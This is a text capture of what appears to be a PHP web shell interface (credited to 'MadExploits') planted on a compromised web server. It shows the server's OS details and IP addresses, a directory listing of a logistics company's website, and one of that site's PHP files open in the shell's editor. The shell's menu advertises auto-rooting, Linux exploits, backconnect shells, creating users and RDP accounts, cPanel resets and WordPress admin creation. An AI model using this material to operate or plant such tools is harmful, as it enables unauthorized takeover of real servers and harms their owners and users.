Linux 45-56-67-123 5.14.0-503.16.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Dec 13 01:47:05 EST 2024 x86_64
Apache/2.4.62 (AlmaLinux) OpenSSL/3.2.2
: 45.56.67.123 | : 18.191.154.119
Cant Read [ /etc/named.conf ]
8.3.15
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
website2023 /
3xlogistics.com /
[ HOME SHELL ]
Name
Size
Permission
Action
Structure
[ DIR ]
drwxr-xr-x
admin
[ DIR ]
drwxr-xr-x
assets
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
model
[ DIR ]
drwxr-xr-x
.htaccess
197
B
-r--r--r--
0language.php
3.87
KB
-rw-r--r--
1Head.php
5.32
KB
-rw-r--r--
2Menu.php
4.08
KB
-rw-r--r--
2Menu_Mobile.php
838
B
-rw-r--r--
2Menu_PC.php
6.6
KB
-rw-r--r--
3footer.php
2.05
KB
-rw-r--r--
4End.php
1.11
KB
-rw-r--r--
about.php
18.25
KB
-rw-r--r--
accessibility.php
2.94
KB
-rw-r--r--
air_freight.php
2.8
KB
-rw-r--r--
certificated.php
4.17
KB
-rw-r--r--
content.php
469
B
-rw-r--r--
content_detail.php
7.08
KB
-rw-r--r--
content_list.php
3.85
KB
-rw-r--r--
customerservice.php
6.3
KB
-rw-r--r--
documents.php
124.45
KB
-rw-r--r--
faq.php
8.04
KB
-rw-r--r--
for-business.php
84.05
KB
-rw-r--r--
fraud-awareness.php
15.03
KB
-rw-r--r--
get-quote.php
1.1
KB
-rw-r--r--
googlef0da6945598bd8e7.html
53
B
-rw-r--r--
index.php
11.08
KB
-rwxr-xr-x
index_banner1.php
4.21
KB
-rw-r--r--
index_information.php
421
B
-rw-r--r--
index_logistics_consulting_ser...
3.48
KB
-rw-r--r--
index_shipping_services.php
2.8
KB
-rw-r--r--
legal-notice.php
3.43
KB
-rw-r--r--
logisticssolutions.php
3.12
KB
-rw-r--r--
news-event.php
4.19
KB
-rw-r--r--
ocean_freight.php
2.88
KB
-rw-r--r--
pallets.php
9.93
KB
-rw-r--r--
profile-detail.php
5.71
KB
-rw-r--r--
shipnow.php
81
KB
-rw-r--r--
terms-of.php
7.56
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index_logistics_consulting_service.php
<style> .text-upper{ text-transform: uppercase; } </style> <span class="link-anchor" id="parsysPath_teaser_image_contain_27586855"></span> <div class="c-teaser-image component-wide component-margin"> <div class="cq-dd-paragraph"> <span class="link-anchor" id="parsysPath_page_headline"></span> <div class="c-page-headline component-small l-grid--left-s l-grid--center-m has-rte component-margin"> <div class="c-page-headline--wrapper"> <h1 class="text-upper"><?= $text1; ?></h1> </div> </div> </div> <div class="c-teaser-image--content l-grid l-grid--center-m"> <?PHP if ($_SESSION['ses_check_language'] == "th") { //1 $CategoryContent_ID = 66; $CategoryContentLanguage_ID = 153; } else if ($_SESSION['ses_check_language'] == "en") { //2 $CategoryContent_ID = 66; $CategoryContentLanguage_ID = 152; } include 'Structure/Structure_Content_Loop.php'; while ($objResult_content = mysqli_fetch_array($objQuery_content)) { $ContentID = $objResult_content["Content_ID"]; $ContentName = $objResult_content["Content_Name"]; $ContentContent1 = $objResult_content["Content_Content1"]; $ContentContent2 = $objResult_content["Content_Content2"]; $ContentContent3 = $objResult_content["Content_Content3"]; $ContentContent4 = $objResult_content["Content_Content4"]; $ContentContent5 = $objResult_content["Content_Content5"]; $ContentNumber = $objResult_content["Content_Number"]; $ContentDate = $objResult_content["Content_Date"]; $ContentTime = $objResult_content["Content_Time"]; $ContentContent1 = urldecode($ContentContent1); $ContentContent2 = urldecode($ContentContent2); $ContentContent3 = urldecode($ContentContent3); $ContentContent4 = urldecode($ContentContent4); $ContentContent5 = urldecode($ContentContent5); include 'Structure/Structure_Content_check.php'; $SQL_Content_Img = " SELECT ContentImg_ID , Content_ID, ContentImg_Name , ContentImg_Sort FROM content_img WHERE Content_ID = $ContentID ORDER BY ContentImg_Sort ASC "; $objQuery_Content_Img = $objConnect->query($SQL_Content_Img); ?> <div class="c-teaser-image--item shadow-small"> <div class="c-teaser-image--image"> <?PHP while ($objResult_Content_Img = mysqli_fetch_array($objQuery_Content_Img)) { $CIMG_ContentImgName = $objResult_Content_Img["ContentImg_Name"]; ?> <picture> <a href="profile-detail.php?ID=<?= $ContentID ?>&CID=<?= $CategoryContent_ID ?>&LID=<?= $CategoryContentLanguage_ID ?>"><img src="model/upload/img/IMG_Home/<?= $CIMG_ContentImgName; ?>" class="img-index1" /> </a> </picture> <?PHP } ?> </div> <div class="c-teaser-image--textbox has-rte l-grid--w-100pc-s l-grid--p-2u-s bg-index1" style="text-align: center;"> <a href="profile-detail.php?ID=<?= $ContentID ?>&CID=<?= $CategoryContent_ID ?>&LID=<?= $CategoryContentLanguage_ID ?>"><?= $ContentContent1; ?></a> </div> </div> <?PHP } ?> </div> </div>
Close